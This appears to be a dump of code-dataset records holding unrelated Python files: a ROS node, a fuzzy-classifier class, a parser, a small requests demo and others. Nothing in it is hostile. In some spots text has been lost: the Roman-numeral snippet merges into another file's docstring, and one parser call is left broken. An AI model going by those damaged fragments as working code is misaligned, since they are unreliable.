rospy.Subscriber('progress',ProgressMsg,self.handle_progress_msg)\n\n\n def handle_progress_msg(self,data):\n frame_count = data.frame_count \n progress_t = data.progress_t \n record_t = data.record_t\n image_array = numpy.array(self.base_array)\n if record_t > 0:\n fill_ind = int(self.image_shape[1]*progress_t/record_t)\n else:\n fill_ind = self.image_shape[1]\n for i in range(0,3):\n image_array[:,:fill_ind,i] = self.fill_color[i]\n cv_image = cv.fromarray(image_array)\n rosimage = self.bridge.cv_to_imgmsg(cv_image,'rgb8')\n self.pub.publish(rosimage)\n\n def run(self):\n rospy.spin()\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n\n node = Progress_Bar()\n node.run()\n\n\n","repo_name":"iorodeo/lia_video","sub_path":"lia_progress/nodes/progress_bar_node.py","file_name":"progress_bar_node.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16751505410","text":"str=\"MCMXCIV\"\nres=0\npre=0\nroman={\"I\":1,\"V\":5,\"X\":10,\"L\":50,\"C\":100,\"D\":500,\"M\":1000}\nfor x in str:\n res=res+roman[x]\n if(pre [110 001 and [ 000\n 111 011] 110 ]\n 2. Convert the bit matrices into \"business\" matrices i.e. matrices\n with numbers that represents something for the fuzzy system (e.g. the\n index of the variable to used for a particular antecedent.\n [110 001 and [ 000 -> [6 1 and [0\n 111 011] 110 ] 7 3] 6]\n For example this could means that the 2nd rule uses the var 7 and 3 and\n set the consequent to 6th class.\n\n 3. Uses these matrices to build the fuzzy system and all their parts (\n fuzzy rules, linguistic variables,...)\n\n\n **Specie 1 - the MFs**\n The shape of the 1d bit array of sp1 is the following:\n [ lv0p0, lv0p1, ..., lv0pK, lv1p0, lv1p2, ..., lv1pK,\n lv2p0, lv2p1, ..., lvIp0, lvIp1, ...., ..., lvIpK ]\n\n Where:\n K = p_position_per_lv\n I = n_lv_per_ind_sp1\n\n An individual of sp1 (i.e. an instance of this bit array) can been seen as\n a pool of linguistic variables defined by their respective p-points. The\n size of the pool is I.\n\n This bit array will be converted to a matrix called r_mfs.\n\n r_mfs is a KxI matrix like this:\n\n ^ ||<------------- p_positions --------->|\n | |-----||-------|-------|-------|-----|-------|\n n_lv_per_ind | lv0 || lv0p0 | lv0p1 | lv0p2 | ... | lv0pK |\n | | lv1 || lv1p0 | lv1p1 | lv1p2 | ... | lv1pK |\n v | lvI || lvIp0 | lvIp1 | lvIp2 | ... | lvIpK |\n\n\n Meaning: lvipj is the j-th point (or p position) of the i-th linguistic\n variable of the pool. lvipj values are in [0, 1]. This kind of represents the\n percentage of a variable (which needs to be scaled in [0,1] beforehand).\n You might want to pre-process outliers before running TrefleClassifier.\n For example, for a triangular LV (triLV) the value lv4p1 is represented by\n 'p1' on the x-axis:\n\n\n Membership functions for variable 4\n ^\n | low medium high\n 1 | X X XX\n | X X X XX\n | X X X XX\n | X X XX X\n | XX XXX\n | X X XX XX\n | X X XX XX\n | X X XX\n 0 +--------------------------------------> 1\n p0 *p1* p2\n\n In \"lvipK\" the \"K\" defines the number of p-positions a linguistic variable has.\n In the case of a triangular membership function (as it has been implemented\n so far), the number of p-positions (i.e. K) is >= n_labels (i.e. the\n linguistic labels like LOW, MEDIUM and HIGH).\n\n The resolution (i.e. the number of possible values that a p position can\n take is defined by the p_positions_per_lv. So the number of bits needed to\n represent the desired p_positions_per_lv is:\n n_bits_per_mf = ceil(log2(p_positions_per_lv))\n\n The total number of bits used is given by _compute_needed_bits_for_sp1()\n\n\n **Specie 2 - the rules**\n\n\n\n **THIS IS OUTDATED** !!!\n r_sel_vars\n r_lv\n r_labels\n r_cons\n\n\n The shape of the 1d bit array of sp2 is the following:\n [ r0a0, r0a1, ... r0aN, r1a0, r1a1, ... rMaN,\n r0lv0, r0lv1,... r0lvN, r1lv0, r1lv1,... rMlvN,\n r0lbl0, r0lbl1,...r0lblN, r1lbl0, r1lbl1,...rMlblN,\n r0c0, r0c1,...r0cJ, r1c0, r1c1,...rMcJ ]\n\n Where:\n M = n_rules\n N = n_max_vars_per_rule\n J = n_consequents i.e. number of output variables that are NOT mutually\n exclusive\n\n The rules are composed of two parts. The antecedents (Aij) and the\n consequents (Cij).\n\n The Aij part indicates which antecedents/variables are used by the\n model/fis for all its rules. It consists of three \"matrices\" let's call\n them r_sel_vars, r_lv and r_labels.\n\n r_sel_vars is a NxM matrix like this:\n\n ^ ||<----- n_max_vars_per_rule ----->|\n | |-------||------|------|------|-----|------|\n n_rules | rule0 || r0a0 | r0a1 | r0a2 | ... | r0aN |\n | | rule1 || r1a0 | r1a1 | r1a2 | ... | r1aN |\n v | ruleM || rMa0 | rMa1 | rMa2 | ... | rMaN |\n\n A single element e.g. r1a2 is a link/\"pointer\" to the variable index/number\n to use for the 3rd antecedent (a2) of the 2nd rule (r1). A single element\n is in the interval [0, n_vars-1] where n_vars is deduced from X_train.\n\n\n r_lv is a NxM matrix like this:\n\n ^ ||<------- n_max_vars_per_rule ------->|\n | |-------||-------|-------|-------|-----|-------|\n n_rules | rule0 || r0lv0 | r0lv1 | r0lv2 | ... | r0lvN |\n | | rule1 || r1lv0 | r1lv1 | r1lv2 | ... | r1lvN |\n v | ruleM || rMlv0 | rMlv1 | rMlv2 | ... | rMlvN |\n\n A single element e.g. r0lv2 is a link/\"pointer\" to a linguistic variable\n defined in an individual from sp1. This element's value is a number\n representing the index of the lv (i.e. a number in [0, I-1] where I\n is n_lv_per_ind) to use from the paired ind_sp1. For example if r0lv2=4 then\n the linguistic variable used for the variable of the 1st rule (r0) and the 3rd (lv2)\n antecedent will be the 5th row of the matrix r_mfs of the paired ind_sp1.\n Note: since elements of r_lv (i.e. antecedents) are pointers to a\n linguistic variable (lvI) it is possible that:\n 1. 2 or more antecedents points to the same lvI (i.e. surjectivity)\n 2. Not all lvI are pointed by an element (i.e. injectivity)\n 3. 2 antecedents or more use the same variable but point to different lvI\n\n The point 3. is a problem because the interpretability criteria tell us that\n a fuzzy variable should use the same definition across all rules. To fix this\n problem, we only keep the last definition of a variable. This is done in\n the C++ part with the map vars_lv_lookup.\n\n r_labels is a NxM matrix like this:\n\n ^ ||<--------- n_max_vars_per_rule --------->|\n | |-------||--------|--------|--------|-----|--------|\n n_rules | rule0 || r0lbl0 | r0lbl1 | r0lbl2 | ... | r0lblN |\n | | rule1 || r1lbl0 | r1lbl1 | r1lbl2 | ... | r1lblN |\n v | ruleM || rMlbl0 | rMlbl1 | rMlbl2 | ... | rMlblN |\n\n A single element e.g. r1mf2 is a link/\"pointer\" to a linguistic label\n (by label we mean for example 0 for LOW, 1 for MEDIUM, 2 for HIGH, ...\n last for DONT_CARE) to use for the variable/antecedent r1a2 of the\n r_sel_vars \"matrix\". For example if r1a2=6, r1lbl2=2 and n_true_labels=4\n (i.e. VERY LOW, LOW, MEDIUM, HIGH) then it would mean that the 3rd\n antecedent (a2) of the 2nd rule (r1) is \"5th variable is MEDIUM\". (5th\n because of \"=6\" and MEDIUM because of lbl=2 with n_true_labels=4). A single\n element is in the interval [0, (n_true_labels + dc_weight)-1].\n With dc_weight=1 all labels have the same probability to be chosen.\n To increase the probability to chose/select a DC, increase dc_weight.\n\n\n The other part of sp2 is Cij. It defines the consequents (i.e. classes\n in a classification problem or a label in a regression problem) that are\n used by the model/fis for all its rules. It consists of a single \"matrix\"\n let's call it r_cons.\n\n r_cons is a JxM matrix like:\n\n\n ^ ||<-------- n_consequents -------->|\n | |-------||------|------|------|-----|------|\n n_rules | rule0 || r0c0 | r0c1 | r0c2 | ... | r0cJ |\n | | rule1 || r1c0 | r1c1 | r1c2 | ... | r1cJ |\n v | ruleM || rMc0 | rMc1 | rMc2 | ... | rMcJ |\n\n A single element e.g. r1c2 is either a class in [0, n_classes-1] if the\n the problem is a classification problem, or a label if the problem\n is a regression problem.\n All columns/consequents are NOT mutually exclusive. Therefore, for iris\n classification problem, you surely want to have 1 consequent that can take\n the values {0, 1, 2} mapped to \"virginica\", \"setosa\", \"versicolor\" since\n they ARE mutually exclusive.\n Therefore, if you want to transform this iris problem into a one-hot version\n of it, create 3 consequents with 2 classes per consequent.\n You can even have a mixed problem (classification and regression). For\n example, just add a column/consequent to the previous iris example. Let's\n call this new consequent the pollen concentration (i.e. a label, let's say\n LOW. This label is a positive integer in [0, n_labels_per_cons-1].\n \"\"\"\n\n def __init__(\n self,\n X_train: np.array,\n y_train: np.array,\n n_rules: int,\n n_classes_per_cons: List[int],\n default_cons: np.array,\n n_max_vars_per_rule: int,\n n_labels_per_mf: int,\n n_labels_per_cons: Type[LabelEnum] = Label3,\n p_positions_per_lv: int = 32, # 5 bits\n dc_weight: int = 1,\n n_lv_per_ind_sp1: int = None,\n ):\n \"\"\"\n\n :param X_train: a 2d numpy array representing the train data. Each\n column is a variable and each row is an observation.\n\n :param y_train: a 2d numpy array representing the output classes/values\n for the train data. Each column is a mutually exclusive output (either\n a class or a regression value) and each row is the outputs for an\n observation.\n\n :param n_rules: the number of rules the fuzzy system have. The total\n number of rules is n_rules + 1 (the default rule).\n\n :param n_classes_per_cons: [n_classes_cons0, n_classes_cons1, ...]\n where n_class_consX is the number of classes for the X-th consequent.\n If the consequent is a continuous variable (i.e. regression) set the\n value to 0.\n\n :param default_cons: array of numbers to set the default consequent(s)\n for the default rule. For a consequent representing a class, specify the\n class directly. For a consequent representing a continuous variable,\n specify LabelXXX.YYY (where XXX is the same number as n_labels_per_cons,\n e.g. Label3 and YYY is a label value of this class, e.g. Label3.LOW()).\n Example: for a problem with 2 consequents where the 1st represents a\n class (e.g. n_classes=6) and the 2nd is a continuous variable (e.g.\n split with n_labels_per_cons=Label4) then you can set\n default_cons=[3, Label4.HIGH()]\n\n :param n_max_vars_per_rule: Maximum number of variables to use for a\n single rule. Use this parameter to reduce the size of the fuzzy system.\n\n :param n_labels_per_mf: number of labels per membership function. For\n example, n_labels_per_mf=4 will correspond to \"low, medium, high,\n very high\"\n\n :param n_labels_per_mf: number of labels per membership function. For\n example, n_labels_per_mf=4 will correspond to \"low, medium, high,\n very high\"\n\n :param n_labels_per_cons: number of labels per membership function for\n the consequents (singleton MFs). For example, use 4 to have LOW, MEDIUM,\n HIGH, VERY_HIGH labels. These labels are equally spaced in the range\n (i.e. definition domain of y_train) so when n_labels_per_cons=4, LOW is\n set to 1/4 of abs(cons_min - cons_max).\n\n :param p_positions_per_lv: Integer to represent the\n number of p positions (i.e. the possible values the membership functions\n (MFs) of a linguistic variable (LV) can take). For example, if\n p_positions_per_lv=4, then a MF's inflexion points will be at 0%, 33%,\n 66% 100% of the variable range. In others words, the linguistic variable\n will be cut in p_positions_per_lv. This value must be a multiple of 2.\n\n :param dc_weight: integer. Set the don't care weight. If dc_weight=k\n then a variable v has k more chance to be a don't care. Setting\n dc_weight=0 will lead to create rules that have exactly\n n_max_vars_per_rule. Setting dc_weight to a big number will to lead\n less rules than n_rules because all their antecedents will be set to\n don't care.\n\n :param n_lv_per_ind_sp1: This is an advanced parameter. it's an integer\n to represent the number of MF encoded per individual of sp1. In other\n words it is the pool of MF where the linguistic variable from ind_sp2\n will be defined from. Must be >= n_max_vars_per_rule, ideally a\n multiple of 2. If not will be ceil-ed to the closest multiple of 2. If\n the problem you try to solve is big you maybe should increase this\n number. By default, this value is set (before ceiling) to\n n_max_vars_per_rule * n_rules. This ensures that each LV can have its\n own MF.\n \"\"\"\n\n super().__init__()\n self._X, self._X_scaler = CocoIndividual._minmax_norm(X_train)\n self._y = y_train\n self._n_rules = n_rules\n self._n_classes_per_cons = np.asarray(n_classes_per_cons)\n self._default_cons = np.asarray(default_cons)\n self._n_max_vars_per_rule = n_max_vars_per_rule\n self._n_true_labels = n_labels_per_mf\n self._n_labels_cons = n_labels_per_cons\n self._p_positions_per_lv = p_positions_per_lv\n self._dc_weight = dc_weight\n self._mfs_shape = MFShape.TRI_MF\n\n self._n_vars = self._X.shape[1]\n\n if self._n_max_vars_per_rule is None:\n self._n_max_vars_per_rule = self._n_vars\n\n if n_lv_per_ind_sp1 is None:\n n_lv_per_ind_sp1 = self._n_max_vars_per_rule * self._n_rules\n\n self._n_bits_per_lv = ceil(log(n_lv_per_ind_sp1, 2))\n\n try:\n self._n_cons = self._y.shape[1]\n except IndexError: # y is 1d so each element is an output\n self._n_cons = 1\n\n self._cons_n_labels = self._compute_cons_n_labels(self._n_classes_per_cons)\n\n CocoIndividualValidator(self).validate()\n self._default_cons = self._convert_labelenum_to_int(self._default_cons)\n\n self._n_bits_per_mf = ceil(log(self._p_positions_per_lv, 2))\n self._n_bits_per_ant = ceil(log(self._n_vars, 2))\n self._n_bits_per_cons = self._compute_n_bits_per_cons()\n\n # chosen arbitrarily, enough to cover a high number of labels (i.e. 2**5=32)\n self._n_bits_per_label = 5\n\n self._n_bits_sp1 = self._compute_needed_bits_for_sp1()\n self._n_bits_sp2 = self._compute_needed_bits_for_sp2()\n self._ind_sp1_class = FixedSizeBitArrayFactory.create(self._n_bits_sp1)\n self._ind_sp2_class = FixedSizeBitArrayFactory.create(self._n_bits_sp2)\n\n # contains True if i-th cons is a classification variable or False if regression\n self._cons_type = [bool(c) for c in self._n_classes_per_cons]\n\n self._cons_scaler = self._create_cons_scaler()\n\n self._cons_range = np.vstack(\n (self._cons_scaler.data_min_, self._cons_scaler.data_max_)\n ).T.astype(np.double)\n\n self._vars_range = self._create_vars_range(self._X_scaler)\n\n self._nce = NativeCocoEvaluator(\n X_train=self._X,\n n_vars=self._n_vars,\n n_rules=self._n_rules,\n n_max_vars_per_rule=self._n_max_vars_per_rule,\n n_bits_per_mf=self._n_bits_per_mf,\n n_true_labels=self._n_true_labels,\n n_bits_per_lv=self._n_bits_per_lv,\n n_bits_per_ant=self._n_bits_per_ant,\n n_cons=self._n_cons,\n n_bits_per_cons=self._n_bits_per_cons,\n n_bits_per_label=self._n_bits_per_label,\n dc_weight=dc_weight,\n cons_n_labels=self._cons_n_labels,\n n_classes_per_cons=self._n_classes_per_cons,\n default_cons=self._default_cons,\n vars_range=self._vars_range,\n cons_range=self._cons_range,\n )\n\n def predict(self, ind_tuple, X=None):\n ind_sp1, ind_sp2 = self._extract_ind_tuple(ind_tuple)\n\n if X is None:\n y_pred = self._nce.predict_native(ind_sp1, ind_sp2)\n else:\n X_normed = self._X_scaler.transform(X)\n y_pred = self._nce.predict_native(ind_sp1, ind_sp2, X_normed)\n\n return self._post_predict(y_pred)\n\n def to_tff(self, ind_tuple):\n ind_sp1, ind_sp2 = self._extract_ind_tuple(ind_tuple)\n return self._nce.to_tff(ind_sp1, ind_sp2)\n\n def get_y_true(self):\n return self._y\n\n def print_ind(self, ind_tuple):\n ind_sp1, ind_sp2 = self._extract_ind_tuple(ind_tuple)\n self._nce.print_ind(ind_sp1, ind_sp2)\n\n def get_ind_sp1_class(self):\n return self._ind_sp1_class\n\n def get_ind_sp2_class(self):\n return self._ind_sp2_class\n\n @staticmethod\n def clone(ind: bitarray):\n return ind.deep_copy()\n\n def _create_cons_scaler(self):\n # y_pred returned by NativeCocoEvaluator are in range\n # [0, n_class_per_cons-1] and it needs to be scaled back to\n # [min_val_cons, max_val_cons] (which for binary and multiclass\n # consequents do nothing but this is needed for continuous variables)\n\n cons_scaler = MinMaxScaler()\n cons_scaler.fit(self._y.astype(np.double))\n return cons_scaler\n\n @staticmethod\n def _extract_ind_tuple(ind_tuple):\n # convert ind_sp{1,2} in string format to make it easy to use it C++\n return ind_tuple[0].bits.to01(), ind_tuple[1].bits.to01()\n\n def _post_predict(self, y_pred):\n return self._scale_back_y(y_pred)\n\n @staticmethod\n def _generate_ind(n_bits):\n bin_str = format(randint(0, (2 ** n_bits) - 1), \"0{}b\".format(n_bits))\n return bitarray(bin_str)\n\n def _compute_needed_bits_for_sp1(self):\n n_lv_per_ind = 2 ** self._n_bits_per_lv\n return int(n_lv_per_ind * self._n_true_labels * self._n_bits_per_mf)\n\n def _compute_needed_bits_for_sp2(self):\n # bits for r_sel_vars\n n_bits_r_sel_vars = (\n self._n_rules * self._n_max_vars_per_rule * self._n_bits_per_ant\n )\n\n # bits for r_lv\n n_bits_r_lv = self._n_rules * self._n_max_vars_per_rule * self._n_bits_per_lv\n\n # bits for r_labels\n n_bits_r_labels = (\n self._n_rules * self._n_max_vars_per_rule * self._n_bits_per_label\n )\n\n # bits for r_cons\n n_bits_r_cons = self._n_rules * self._n_cons * self._n_bits_per_cons\n\n n_total_bits = n_bits_r_sel_vars + n_bits_r_lv + n_bits_r_labels + n_bits_r_cons\n return int(n_total_bits) # int cast because of the multiple ceil() used above\n\n def _compute_n_bits_per_cons(self):\n n_max_classes = max(self._n_classes_per_cons)\n\n # if all consequents are continuous variables (i.e. regression\n # i.e. value = 0) then we use a minimum of self._n_labels_per_cons)\n n_max_classes = max(n_max_classes, self._n_labels_cons.len())\n return ceil(log(n_max_classes, 2))\n\n def _compute_cons_n_labels(self, n_classes_per_cons):\n cons_n_labels = n_classes_per_cons.copy().astype(np.int)\n cons_n_labels[cons_n_labels == 0] = self._n_labels_cons.len()\n return cons_n_labels\n\n def _scale_back_y(self, y):\n # -1 because y is in [0, cons_n_labels-1]\n y_ = y / (self._cons_n_labels - 1)\n return self._cons_scaler.inverse_transform(y_)\n\n @staticmethod\n def _minmax_norm(X_train):\n scaler = MinMaxScaler()\n X_train_scaled = scaler.fit_transform(X_train)\n return X_train_scaled, scaler\n\n @staticmethod\n def _create_vars_range(scaler):\n vars_range = np.vstack((scaler.data_min_, scaler.data_max_)).T.astype(np.double)\n return vars_range\n\n @staticmethod\n def _convert_labelenum_to_int(labels_enums):\n def is_int_or_numpy_int(v):\n try:\n return issubclass(v.dtype.type, (int, np.integer))\n except:\n return False\n\n return [\n cons if is_int_or_numpy_int(cons) else cons.value for cons in labels_enums\n ]\n","repo_name":"krypty/trefle","sub_path":"trefle/evo/experiment/coco/coco_individual.py","file_name":"coco_individual.py","file_ext":"py","file_size_in_byte":21693,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"43517656332","text":"# 2차원 평면상에 N(3 ≤ N ≤ 10,000)개의 점으로 이루어진 다각형이 있다. 이 다각형의 면적을 구하는 프로그램을 작성하시오.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\ndef polygon_area(x, y):\r\n n = len(x)\r\n area = 0\r\n j = n - 1\r\n for i in range(n):\r\n area += (x[j] + x[i]) * (y[j] - y[i])\r\n j = i\r\n return abs(area / 2.0)\r\n\r\nn = int(input())\r\nX = []\r\nY = []\r\nfor i in range(n):\r\n x, y = map(int, input().split())\r\n X.append(x)\r\n Y.append(y)\r\n\r\narea = polygon_area(X, Y)\r\nprint(round(area, 1))","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"2000~2999/2166.py","file_name":"2166.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4037718002","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:序\n\n\nimport requests\n\n# get请求\nparams = {\"word\": \"无涯\", \"pobook\": 0}\n\nurl = \"https://yuedu.baidu.com/search\"\n\nr = requests.get(url=url, params=params)\n\nprint(r.content.decode(\"gbk\"))\nprint(r.url)\n\n# post请求\n\nurl=\"http://httpbin.org/post\"\n\ndata={\"name\":\"Cesare\",\"age\":28}\n\nr=requests.post(url=url,data=data)\n\nprint(r.json())\n","repo_name":"CesareCheung/Autotest_Demo","sub_path":"requests库/params参数.py","file_name":"params参数.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34297213411","text":"from typing import Any, Generator, Optional, Callable\nfrom .ast_nodes import *\nfrom .lexer import Token, TokenType\n\n\nclass Parser:\n def __init__(self, source_code: str, tokens: Generator[Token, None, None]):\n self.source_code = source_code\n self.tokens = tokens\n self.current_token: Optional[Token] = None\n self.next()\n\n def next(self):\n try:\n self.current_token = next(self.tokens)\n except StopIteration:\n self.current_token = None\n return self.current_token\n\n def parse(self) -> Module:\n functions: list[FunctionDeclaration] = []\n while True:\n self.skip_newlines()\n if self.match(TokenType.KEYWORD, 'fn'):\n functions.append(self.function_declaration())\n else:\n break\n self.expect(TokenType.NEWLINE)\n return Module(functions)\n\n def program(self):\n # Implement program rule\n pass\n\n def import_statement(self):\n # Implement import_statement rule\n pass\n\n def structure_declaration(self):\n # Implement structure_declaration rule\n pass\n\n def function_call_expression(self) -> FunctionCallExpression:\n self.expect(TokenType.SYMBOL, \"<\")\n function_name = self.expect(TokenType.IDENTIFIER).value\n\n arguments: list[tuple[str, ASTNode]] = []\n while not self.match(TokenType.SYMBOL, \"/>\") and not self.match(TokenType.SYMBOL, \">\"):\n arg_name = self.expect(TokenType.IDENTIFIER).value\n self.expect(TokenType.OPERATOR, \"=\")\n\n # if self.match(TokenType.STRING_LITERAL):\n # arg_value = self.parse_string_literal()\n # else:\n self.expect(TokenType.SYMBOL, \"{\")\n self.skip_newlines()\n arg_value = self.expression()\n self.skip_newlines()\n self.expect(TokenType.SYMBOL, \"}\")\n arguments.append((arg_name, arg_value))\n\n children = None\n if self.match(TokenType.SYMBOL, \"/>\"):\n self.next()\n else:\n self.expect(TokenType.SYMBOL, \">\")\n self.skip_newlines()\n children: list[ASTNode] = []\n\n while not self.match(TokenType.SYMBOL, \"\")\n\n return FunctionCallExpression(function_name, arguments, children)\n\n def function_declaration(self) -> FunctionDeclaration:\n self.expect(TokenType.KEYWORD, 'fn')\n name = self.expect(TokenType.IDENTIFIER)\n [arguments, return_type, block] = self.function_after_identifier()\n return FunctionDeclaration(name.value, arguments, return_type, block)\n\n def function_after_identifier(self):\n self.expect(TokenType.SYMBOL, '(')\n self.skip_newlines()\n arguments = self.argument_list() if self.match(TokenType.IDENTIFIER) else []\n self.expect(TokenType.SYMBOL, ')')\n return_type = None\n if self.match(TokenType.SYMBOL, \"->\"):\n self.next()\n return_type = self.accessible_type_expression()\n return arguments, return_type, self.block()\n\n def block(self):\n self.expect(TokenType.SYMBOL, \"{\")\n self.skip_newlines()\n\n statements = []\n return_expression = None\n if self.has_next_statement():\n statements = self.statement_list()\n if self.match(TokenType.KEYWORD, \"return\"):\n self.next()\n return_expression = self.statement()\n self.skip_newlines()\n self.expect(TokenType.SYMBOL, \"}\")\n\n return Block(statements, return_expression)\n\n def has_next_statement(self):\n return not (self.match(TokenType.KEYWORD, \"return\") or self.match(TokenType.SYMBOL, \"}\"))\n\n def go_next_statement(self):\n if not self.match(TokenType.NEWLINE):\n return False\n self.skip_newlines()\n return self.has_next_statement()\n\n def statement_list(self):\n statements = [self.statement()]\n while self.go_next_statement():\n statements.append(self.statement())\n return statements\n\n def statement(self):\n return self.expression()\n\n def argument_list(self):\n arguments = [self.argument()]\n while self.match(TokenType.SYMBOL, \",\"):\n self.next()\n self.skip_newlines()\n if not self.match(TokenType.IDENTIFIER):\n break\n arguments.append(self.argument())\n return arguments\n\n def argument(self):\n identifier = Identifier(self.expect(TokenType.IDENTIFIER).value)\n self.expect(TokenType.SYMBOL, \":\")\n type_expression = self.accessible_type_expression()\n return Argument(identifier, type_expression)\n\n def accessible_type_expression(self) -> AccessibleTypeExpression:\n name = self.expect(TokenType.TYPE_EXPRESSION)\n child = None\n if self.match(TokenType.SYMBOL, \".\"):\n self.next()\n child = self.accessible_type_expression()\n return AccessibleTypeExpression(name.value, child)\n\n def export_statement(self):\n # Implement export_statement rule\n pass\n\n def type_expression(self):\n # Implement type_expression rule\n pass\n\n def expression(self):\n return self.or_expression()\n\n def or_expression(self):\n return self.binary_expression(self.and_expression, '||')\n\n def and_expression(self):\n return self.binary_expression(self.equality_expression, '&&')\n\n def equality_expression(self):\n return self.binary_expression(self.relational_expression, '==', '!=')\n\n def relational_expression(self):\n return self.binary_expression(self.range_expression, '<', '<=', '>', '>=')\n\n def range_expression(self):\n return self.binary_expression(self.additive_expression, '...', '..<')\n\n def additive_expression(self):\n return self.binary_expression(self.multiplicative_expression, '+', '-')\n\n def multiplicative_expression(self):\n return self.binary_expression(self.unary_expression, '*', '/', '%')\n\n def binary_expression(self, next_expression_fn: Callable[[], ASTNode], *ops: str):\n left = next_expression_fn()\n\n while self.current_token and self.current_token.type == TokenType.OPERATOR and self.current_token.value in ops:\n op = self.current_token.value\n self.next()\n self.skip_newlines()\n right = next_expression_fn()\n left = BinaryExpression(left, op, right)\n\n return left\n\n def unary_expression(self) -> ASTNode:\n if self.current_token and self.current_token.type == TokenType.OPERATOR and self.current_token.value in ['!', '-']:\n op = self.current_token.value\n self.next()\n return UnaryExpression(op, self.primary_expression())\n else:\n return self.primary_expression()\n\n def primary_expression(self) -> ASTNode:\n if self.current_token.type == TokenType.IDENTIFIER:\n name = self.current_token.value\n self.next()\n return IdentifierExpression(name)\n elif self.match(TokenType.SYMBOL, \"<\"):\n return self.function_call_expression()\n elif self.current_token.type in [TokenType.INTEGER_LITERAL, TokenType.FLOAT_LITERAL, TokenType.BOOLEAN_LITERAL]:\n literal_type = self.current_token.type\n if literal_type == TokenType.INTEGER_LITERAL:\n value = int(self.current_token.value)\n elif literal_type == TokenType.FLOAT_LITERAL:\n value = float(self.current_token.value)\n elif literal_type == TokenType.BOOLEAN_LITERAL:\n value = self.current_token.value == 'true'\n self.next()\n return LiteralExpression(value, literal_type)\n else:\n raise SyntaxError(f\"Unexpected token: {self.current_token}\")\n\n def skip_newlines(self):\n while self.current_token and self.current_token.type == TokenType.NEWLINE:\n self.next()\n\n def expect(self, token_type: TokenType, value: Optional[str] = None) -> Token:\n if self.match(token_type, value):\n token = self.current_token\n self.next()\n return token\n else:\n error_line = self.source_code.split(\n '\\n')[self.current_token.line - 1]\n raise SyntaxError(\n f\"Expected {token_type} with value '{value}', but got {self.current_token.type} with value '{self.current_token.value}'\\n\"\n f\"at {self.current_token.file_path}, line {self.current_token.line}, column {self.current_token.column}\\n\"\n f\"{error_line}\\n\"\n f\"{' ' * (self.current_token.column - 1)}^\")\n\n def match(self, token_type: TokenType, value: Optional[str] = None):\n return self.current_token != None and self.current_token.type == token_type and (value is None or self.current_token.value == value)\n","repo_name":"malt03/syvora","sub_path":"syvora/ast_creator/ast_parser.py","file_name":"ast_parser.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17218664266","text":"\nimport json, os\nimport logging\n\nfrom quackCompiler.quack import quack\n\n#Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\ndef invoke(inputpath, outputpath):\n\n settingJson = getScriptFromPath(inputpath)\n settingJson = json.loads(settingJson)\n\n logger.error(settingJson['paramCount'])\n logger.error(settingJson['outputpath'])\n\n inputmodel = settingJson['outputpath']\n modelScript = getScriptFromPath(inputmodel)\n paramCount = int(settingJson['paramCount'])\n content = modelScript\n if paramCount > 0:\n logger.error(settingJson['parameters'])\n paramList = settingJson['parameters']\n for (k,v) in paramList.items():\n content = str(modelScript).replace(\"<%\"+k+\"%>\", str(\"'\"+v+\"'\"))\n\n logger.error(content)\n quack(content, outputpath)\n\ndef getParamList(jsonContent):\n jc = json.loads(str(jsonContent))\n return jc\n\ndef getScriptFromPath(inputpath):\n content = ''\n with open(inputpath, 'r') as f:\n try:\n content = f.read()\n finally:\n f.close()\n return content\n\ndef saveToFile(modelName, modelScript, paramCount, paramList = None, outputpath = None):\n '''\n Save the model to a .model file and the related information to .json\n :param modelName:\n :param modelScript:\n :param paramCount:\n :param paramList:\n :param outputpath:\n :return:\n '''\n if not outputpath:\n outputpath = '/Users/xuzhang/Documents/TOOLS/PYTHON/Django/django_example/quackCompiler/output/'\n outputmodel = outputpath+modelName+'.model'\n with open(outputmodel, 'w') as f:\n f.write(modelScript)\n f.close()\n\n outputdict = {};\n outputdict['paramCount'] = paramCount # count of parameters\n outputdict['outputpath'] = outputmodel # the model's script\n\n if paramCount > 0:\n outputdict['parameters'] = paramList\n logger.error(outputdict)\n\n outputsetting = outputpath+modelName+'.json'\n with open(outputsetting, 'w') as f:\n json.dump(outputdict,f)\n f.close()\n\ndef readResult(infilepath):\n result_file = infilepath+'result.json'\n if not os.path.exists(result_file):\n return 0,[]\n count = 0\n result_list = []\n with open(result_file, 'r') as f:\n for line in f:\n count += 1\n jsonline = eval(line)\n if 'type' in jsonline:\n if jsonline['type'] == 'string':\n subresultpath = jsonline['value']\n with open(subresultpath, 'r') as subf:\n subresult = subf.readlines()\n result_list.append(subresult)\n print(jsonline['value'])\n elif jsonline['type'] == 'picture':\n print(jsonline['value'])\n elif jsonline['type'] == 'pdf':\n print(jsonline['value'])\n else:\n pass\n f.close()\n return count,result_list\n\n","repo_name":"xzhcn6/django_example","sub_path":"quackCompiler/invokeCompile.py","file_name":"invokeCompile.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7917392079","text":"# -*- coding: utf-8 -*-\n\n##\n## subject: WSGI アプリケーションを関数からオブジェクトに変更\n##\n\nimport os\n\n\nclass WSGIApplication(object):\n\n ## オブジェクトをあたかも関数のように呼び出すためのメソッド\n ## (注: Python では obj.__call__(x) を obj(x) と書ける)\n def __call__(self, environ, start_response):\n content = self._render_content(environ)\n #\n status = \"200 OK\"\n headers = [\n ('Content-Type', 'text/plain;charset-utf8'),\n ]\n start_response(status, headers)\n return [content.encode('utf-8')]\n\n ## コンテンツ生成機能を別メソッドに分離する\n def _render_content(self, environ):\n buf = []\n for key in sorted(environ.keys()):\n if key in os.environ:\n continue\n val = environ[key]\n typ = \"(%s)\" % type(val).__name__\n buf.append(\"%-25s 